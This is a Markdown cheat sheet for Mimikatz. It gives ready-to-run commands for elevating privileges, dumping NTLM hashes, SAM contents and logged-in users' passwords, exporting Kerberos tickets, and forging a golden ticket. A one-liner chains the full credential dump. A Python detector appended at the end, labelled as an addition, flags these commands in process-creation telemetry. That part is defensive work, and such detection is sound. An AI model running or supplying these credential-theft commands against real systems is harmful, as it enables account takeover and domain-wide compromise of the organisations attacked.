# Mimikatz Usage

* Check your privilege, boy

```sh
privilege::debug
token::elevate
```

## Dump hashes

* NTLM

```sh
lsadump::lsa /patch
```

```sh
sekurlsa::tickets /export
```

## Dump Local Password hashes

```sh
token::elevate
```

```sh
lsadump::sam
```

* From logged-in users

```sh
sekurlsa::logonPasswords
```

## Golden ticket

* Dump krbtgt hashes and create a ticket; the ticket is saved as ticket.kirbi

```sh
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user:<userid> /domain:<domainname> /sid:<number behind domainname> /krbtgt:<NTLMhash> /id:<RID(dec)>
```

* Use the golden ticket: open a new elevated prompt

```sh
misc::cmd
```

## Oneliner

* Get the stuff

```sh
.\mimikatz "log host-42.log" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit
```
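When mimikatz is driven from the command line as in the one-liner above, every `module::command` argument ends up in process-creation telemetry, which gives defenders a detection point. The following is an added example, not part of the original cheat sheet: it scans process command lines for the commands listed on this page. The event field names and sample records are constructed assumptions.

```python
import re

# Module::command names listed on this page. mimikatz accepts any letter
# case, so matching is case-insensitive.
MIMIKATZ_TOKENS = re.compile(
    r"\b(privilege::debug|token::elevate|misc::cmd|kerberos::golden|"
    r"lsadump::(?:lsa|sam)|sekurlsa::(?:logonpasswords|tickets))\b",
    re.IGNORECASE,
)

# Constructed sample process-creation records (not real telemetry).
# The keys "host", "image" and "command_line" are assumptions; map them
# to whatever your Sysmon or EDR pipeline emits.
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": r"C:\Users\Public\svc.exe",
     "command_line": r'svc.exe "log host-42.log" "privilege::debug" '
                     r'"token::elevate" "sekurlsa::logonpasswords" exit'},
    {"host": "ws-02", "image": r"C:\Windows\System32\findstr.exe",
     "command_line": r'findstr /i "privilege::debug" C:\Logs\*.txt'},
    {"host": "ws-03", "image": r"C:\Windows\System32\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"host": "ws-04", "image": r"C:\Temp\mimikatz.exe",
     "command_line": 'mimikatz.exe "LSADump::SAM" "Token::Elevate" exit'},
]

def scan_command_line(command_line):
    """Return the sorted, lower-cased set of listed commands in a command line."""
    return sorted({m.group(1).lower() for m in MIMIKATZ_TOKENS.finditer(command_line)})

def triage(events, min_hits=2):
    """Return alerts for events whose command line holds >= min_hits commands.

    The image name is reported but never used for matching, so a renamed
    binary is flagged the same way as mimikatz.exe. Requiring two distinct
    commands keeps a single incidental mention (ws-02) out of the alerts.
    """
    alerts = []
    for event in events:
        hits = scan_command_line(event["command_line"])
        if len(hits) >= min_hits:
            alerts.append({"host": event["host"], "image": event["image"], "hits": hits})
    return alerts

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["host"], alert["image"], ", ".join(alert["hits"]))
```

Commands typed into the interactive mimikatz console never appear in a process command line, so this check only covers scripted invocations and has to be paired with LSASS access monitoring.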